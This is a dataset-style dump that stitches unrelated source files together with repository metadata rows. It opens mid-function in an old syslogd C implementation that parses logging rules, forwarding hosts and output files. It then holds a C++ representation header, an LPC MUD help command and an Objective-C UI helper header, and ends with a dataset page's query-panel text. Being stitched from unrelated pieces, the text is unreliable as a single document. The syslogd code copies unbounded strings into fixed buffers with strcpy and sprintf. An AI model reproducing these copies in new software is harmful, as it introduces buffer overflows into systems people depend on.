f->f_pmask[i] = TABLE_ALLPRI;
}
else
{
if ( ignorepri )
for (i2= 0; i2 <= pri; ++i2)
f->f_pmask[i] &= ~(1<<i2);
else
for (i2= 0; i2 <= pri; ++i2)
f->f_pmask[i] |= (1<<i2);
}
}
}
} else {
i = decode(buf, FacNames);
if (i < 0) {
char xbuf[200];
(void) sprintf(xbuf, "unknown facility name \"%s\"", buf);
logerror(xbuf);
return;
}
if ( pri == INTERNAL_NOPRI ) {
if ( ignorepri )
f->f_pmask[i >> 3] = TABLE_ALLPRI;
else
f->f_pmask[i >> 3] = TABLE_NOPRI;
} else if ( singlpri ) {
if ( ignorepri )
f->f_pmask[i >> 3] &= ~(1<<pri);
else
f->f_pmask[i >> 3] |= (1<<pri);
} else {
if ( pri == TABLE_ALLPRI ) {
if ( ignorepri )
f->f_pmask[i >> 3] = TABLE_NOPRI;
else
f->f_pmask[i >> 3] = TABLE_ALLPRI;
} else {
if ( ignorepri )
for (i2= 0; i2 <= pri; ++i2)
f->f_pmask[i >> 3] &= ~(1<<i2);
else
for (i2= 0; i2 <= pri; ++i2)
f->f_pmask[i >> 3] |= (1<<i2);
}
}
}
while (*p == ',' || *p == ' ')
p++;
}
p = q;
}
/* skip to action part */
while (*p == '\t' || *p == ' ')
p++;
if (*p == '-')
{
syncfile = 0;
p++;
} else
syncfile = 1;
dprintf("leading char in action: %c\n", *p);
switch (*p)
{
case '@':
#ifdef SYSLOG_INET
if (!InetInuse)
break;
(void) strcpy(f->f_un.f_forw.f_hname, ++p);
dprintf("forwarding host: %s\n", p); /*ASP*/
if ( (hp = gethostbyname(p)) == NULL ) {
f->f_type = F_FORW_UNKN;
f->f_prevcount = INET_RETRY_MAX;
} else {
f->f_type = F_FORW;
}
bzero((char *) &f->f_un.f_forw.f_addr,
sizeof(f->f_un.f_forw.f_addr));
f->f_un.f_forw.f_addr.sin_family = AF_INET;
f->f_un.f_forw.f_addr.sin_port = LogPort;
if ( f->f_type == F_FORW )
bcopy(hp->h_addr, (char *) &f->f_un.f_forw.f_addr.sin_addr, hp->h_length);
/*
* Otherwise the host might be unknown due to an
* inaccessible nameserver (perhaps on the same
* host). We try to get the ip number later, like
* FORW_SUSP.
*/
#endif
break;
case '|':
case '/':
(void) strcpy(f->f_un.f_fname, p);
dprintf ("filename: %s\n", p); /*ASP*/
if (syncfile)
f->f_flags |= SYNC_FILE;
if ( *p == '|' )
f->f_file = open(++p, O_RDWR);
else
f->f_file = open(p, O_WRONLY|O_APPEND|O_CREAT|O_NOCTTY,
0644);
if ( f->f_file < 0 ){
f->f_file = F_UNUSED;
dprintf("Error opening log file: %s\n", p);
logerror(p);
break;
}
if (isatty(f->f_file)) {
f->f_type = F_TTY;
untty();
}
else
f->f_type = F_FILE;
if (strcmp(p, ctty) == 0)
f->f_type = F_CONSOLE;
break;
case '*':
dprintf ("write-all\n");
f->f_type = F_WALL;
break;
default:
dprintf ("users: %s\n", p); /* ASP */
for (i = 0; i < MAXUNAMES && *p; i++) {
for (q = p; *q && *q != ','; )
q++;
(void) strncpy(f->f_un.f_uname[i], p, UNAMESZ);
if ((q - p) > UNAMESZ)
f->f_un.f_uname[i][UNAMESZ] = '\0';
else
f->f_un.f_uname[i][q - p] = '\0';
while (*q == ',' || *q == ' ')
q++;
p = q;
}
f->f_type = F_USERS;
break;
}
return;
}
/*
* Decode a symbolic name to a numeric value
*/
int decode(name, codetab)
char *name;
struct code *codetab;
{
register struct code *c;
register char *p;
char buf[40];
dprintf ("symbolic name: %s", name);
if (isdigit(*name))
{
dprintf ("\n");
return (atoi(name));
}
(void) strcpy(buf, name);
for (p = buf; *p; p++)
if (isupper(*p))
*p = tolower(*p);
for (c = codetab; c->c_name; c++)
if (!strcmp(buf, c->c_name))
{
dprintf (" ==> %d\n", c->c_val);
return (c->c_val);
}
return (-1);
}
static void dprintf(char *fmt, ...)
{
va_list ap;
if ( !(Debug && debugging_on) )
return;
va_start(ap, fmt);
vfprintf(stdout, fmt, ap);
va_end(ap);
fflush(stdout);
return;
}
/*
* The following function is responsible for allocating/reallocating the
* array which holds the structures which define the logging outputs.
*/
static void allocate_log()
{
dprintf("Called allocate_log, nlogs = %d.\n", nlogs);
/*
* Decide whether the array needs to be initialized or needs to
* grow.
*/
if ( nlogs == -1 )
{
Files = (struct filed *) malloc(sizeof(struct filed));
if ( Files == (void *) 0 )
{
dprintf("Cannot initialize log structure.");
logerror("Cannot initialize log structure.");
return;
}
}
else
{
/* Re-allocate the array. */
Files = (struct filed *) realloc(Files, (nlogs+2) * \
sizeof(struct filed));
if ( Files == (struct filed *) 0 )
{
dprintf("Cannot grow log structure.");
logerror("Cannot grow log structure.");
return;
}
}
/*
* Initialize the array element, bump the number of elements in the
* the array and return.
*/
++nlogs;
memset(&Files[nlogs], '\0', sizeof(struct filed));
return;
}
/*
* The following function is resposible for handling a SIGHUP signal. Since
* we are now doing mallocs/free as part of init we had better not being
* doing this during a signal handler. Instead this function simply sets
* a flag variable which will tell the main loop to go through a restart.
*/
void sighup_handler()
{
restart = 1;
signal(SIGHUP, sighup_handler);
return;
}
| 24.860251 | 104 | 0.61852 |
6d4c1d279fc80f1ea83a163c05c1deb53e829383 | 603 | h | C | test/EntryRepr.h | DronMDF/zond | c882400aff5f41569e6deee609ddbe7b2b1bc378 | [
"MIT"
] | 5 | 2018-11-14T19:46:49.000Z | 2022-01-08T09:00:45.000Z | test/EntryRepr.h | DronMDF/zond | c882400aff5f41569e6deee609ddbe7b2b1bc378 | [
"MIT"
] | 223 | 2018-11-14T19:20:27.000Z | 2019-02-13T11:53:23.000Z | test/EntryRepr.h | DronMDF/zond | c882400aff5f41569e6deee609ddbe7b2b1bc378 | [
"MIT"
] | null | null | null | // Copyright (c) 2018-2019 Andrey Valyaev <dron.valyaev@gmail.com>
//
// This software may be modified and distributed under the terms
// of the MIT license. See the LICENSE file for details.
#pragma once
#include <memory>
#include <2out/2out.h>
class Entry;
class HttpRequest;
class EntryRepr final : public oout::Representation {
public:
EntryRepr(
const std::shared_ptr<const Entry> &entry,
const std::shared_ptr<const HttpRequest> &request
);
std::string asString() const override;
private:
const std::shared_ptr<const Entry> entry;
const std::shared_ptr<const HttpRequest> request;
};
| 25.125 | 66 | 0.749585 |
92175e50b6189105d44be922dfd062c71df7098b | 429 | c | C | cmds/player/help.c | cdlaimin/mudcore | 49264b44e14056409fb3430cb265e23a7ad6ab2f | [
"MIT"
] | 32 | 2020-02-18T05:28:41.000Z | 2022-03-09T09:10:26.000Z | cmds/player/help.c | cdlaimin/mudcore | 49264b44e14056409fb3430cb265e23a7ad6ab2f | [
"MIT"
] | 3 | 2020-03-29T04:56:37.000Z | 2021-11-21T01:58:35.000Z | cmds/player/help.c | cdlaimin/mudcore | 49264b44e14056409fb3430cb265e23a7ad6ab2f | [
"MIT"
] | 14 | 2020-03-26T02:57:38.000Z | 2022-02-19T11:34:37.000Z | #include <ansi.h>
inherit CORE_CLEAN_UP;
int help(object me);
int main(object me, string arg)
{
object file;
if(arg)
{
if( objectp(file = COMMAND_D->find_command(arg)) ) {
// notify_fail("有这个指令存在,但是并没有详细的说明文件。\n");
return file->help(me);
}
}
return help(me);
}
int help(object me)
{
write(@HELP
指令格式 : help [topic]
这个指令可以查看指定主题的帮助说明。
HELP );
return 1;
}
| 13.83871 | 60 | 0.575758 |
925f14df4554883eef0570ac0406afcc7b6e0d0a | 2,881 | h | C | LTCustom.h | aTreey/CustemControl | 94bf3e043ef87382119cc450d6a8b56c1c77551c | [
"MIT"
] | null | null | null | LTCustom.h | aTreey/CustemControl | 94bf3e043ef87382119cc450d6a8b56c1c77551c | [
"MIT"
] | null | null | null | LTCustom.h | aTreey/CustemControl | 94bf3e043ef87382119cc450d6a8b56c1c77551c | [
"MIT"
] | null | null | null | //
// LTCustom.h
// HaierProduct
//
// Created by LaoTao on 14-5-5.
// Copyright (c) 2014年 CaiGaoBaDou. All rights reserved.
//
#import <Foundation/Foundation.h>
#import <UIKit/UIKit.h>
@interface LTCustom : NSObject
//创建label
+ (UILabel *)creatLabelWithFrame:(CGRect)frame
text:(NSString *)text
alignment:(NSTextAlignment)textAlignment;
+ (UILabel *)creatLabelWithFrame:(CGRect)frame
text:(NSString *)text
font:(UIFont *)font
textColor:(UIColor *)color
alignment:(NSTextAlignment)textAlignment;
//创建带标题的button
+ (UIButton *)creatButtonFrame:(CGRect)frame
title:(NSString *)string
target:(id)target
action:(SEL)sel
tag:(NSInteger)tag;
//创建图片类型的button
+ (UIButton *)creatButtonFrame:(CGRect)frame
imageName:(NSString *)imageName
selectImageNmae:(NSString *)selectImageName
target:(id)target
action:(SEL)sel
tag:(NSInteger)tag;
+ (UIButton *)creatButtonFrame:(CGRect)frame
bgImageName:(NSString *)imageName
bgSelectImageNmae:(NSString *)selectImageName
target:(id)target
action:(SEL)sel
tag:(NSInteger)tag;
//创建textField
+ (UITextField *)creatTextFieldWithFrame:(CGRect)frame
secure:(BOOL)isSecure
place:(NSString *)string
tag:(NSInteger)tag
delegate:(id<UITextFieldDelegate>)delegate;
//创建textView
+ (UITextView *)creatTextViewWithFrame:(CGRect)frame
tag:(NSInteger)tag
delegate:(id<UITextViewDelegate>)delegate;
//创建一个ImageView
+ (UIImageView *)creatImageViewWithFrame:(CGRect)frame
imageName:(NSString *)imageName;
#pragma mark - 添加层
+ (void)addViewLayeView:(UIView *)view
border:(CGFloat)border
corner:(NSInteger)corner;
+ (void)addViewLayeView:(UIView *)view
color:(UIColor *)color
border:(CGFloat)border
corner:(CGFloat)corner;
+ (void)addViewCustomLayer:(UIView *)view;
#pragma mark - 旋转动画
+ (UIImageView *)rotate360DegreeWithImageView:(UIImageView *)imageView;
#pragma mark - 停止旋转
+ (void)imageStopTransform:(UIImageView *)imageView;
//创建一个警告框AlertView
+ (UIAlertView *)showAlertViewTitle:(NSString *)title message:(NSString *)message delegate:(id<UIAlertViewDelegate>)delegate;
#pragma mark - 错误提示
+ (void)showAlertViewWithErrCode:(NSInteger)err_Code;
@end
| 32.738636 | 125 | 0.561958 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.